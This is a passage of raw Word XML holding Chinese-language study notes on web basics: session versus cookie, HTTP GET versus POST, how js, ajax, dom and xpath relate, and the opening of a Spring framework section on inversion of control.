          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是保存在服务端的用户输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00606546" w:rsidRPr="00F41A4C" w:rsidRDefault="00801F8B" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不是很安全</w:t>
      </w:r>
      <w:r w:rsidR="00B95146" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，单个</w:t>
      </w:r>
      <w:r w:rsidR="00B95146" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00B95146" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存的数据不能超过</w:t>
      </w:r>
      <w:r w:rsidR="00B95146" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0071" w:rsidRPr="00F41A4C" w:rsidRDefault="00E84397" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>具有不可跨域名性</w:t>
      </w:r>
      <w:r w:rsidR="00A4025C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A4025C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00A4025C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的有效期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55937" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD320E" w:rsidP="00670D10">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00670D10">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00670D10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidR="00D00044" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C55937" w:rsidRPr="00F41A4C">
        <w:t>Http</w:t>
      </w:r>
      <w:r w:rsidR="00C55937" w:rsidRPr="00F41A4C">
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="00C55937" w:rsidRPr="00F41A4C">
        <w:t>Get</w:t>
      </w:r>
      <w:r w:rsidR="00C55937" w:rsidRPr="00F41A4C">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00C55937" w:rsidRPr="00F41A4C">
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidR="00C55937" w:rsidRPr="00F41A4C">
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0071" w:rsidRPr="00F41A4C" w:rsidRDefault="00F10401" w:rsidP="003377BD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Http</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>定义了与服务器交互的不同方法，最基本的方法有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>种，分别是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>改</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>增</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>删</w:t>
      </w:r>
      <w:r w:rsidR="006314DC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001947B3" w:rsidRPr="00F41A4C" w:rsidRDefault="001947B3" w:rsidP="00390DD9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>用于查找信息</w:t>
      </w:r>
      <w:r w:rsidR="00390DD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>用于修改信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55937" w:rsidRPr="00F41A4C" w:rsidRDefault="00E969B1" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>发送的信息显示在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390DD9" w:rsidRPr="00425D78" w:rsidRDefault="00CD320E" w:rsidP="00425D78">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00670D10">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00670D10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>ajax</w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>dom</w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>xpath</w:t>
      </w:r>
      <w:r w:rsidR="00A503BD" w:rsidRPr="00F41A4C">
        <w:t>的关系</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2A66" w:rsidRPr="00F41A4C" w:rsidRDefault="00187E71" w:rsidP="00CD320E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ajax</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不是新技术，是一些技术的整合，前段采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dom</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>像</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一样按照节点访问，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xpath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用于查找</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00023E55" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD320E" w:rsidP="00023E55">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00FC679D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="008C4860" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spring</w:t>
      </w:r>
      <w:r w:rsidR="00743AD8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
      <w:r w:rsidR="008C4860" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00023E55" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD320E" w:rsidP="00A65BFF">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="008833AC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="00A65BFF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00077A41" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB63A3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidR="00CB63A3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>作用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D477F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00D477F8" w:rsidP="009A6B50">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>管理容器角色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D477F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00D477F8" w:rsidP="009A6B50">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IOC </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>控制反转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D477F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00D477F8" w:rsidP="009A6B50">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
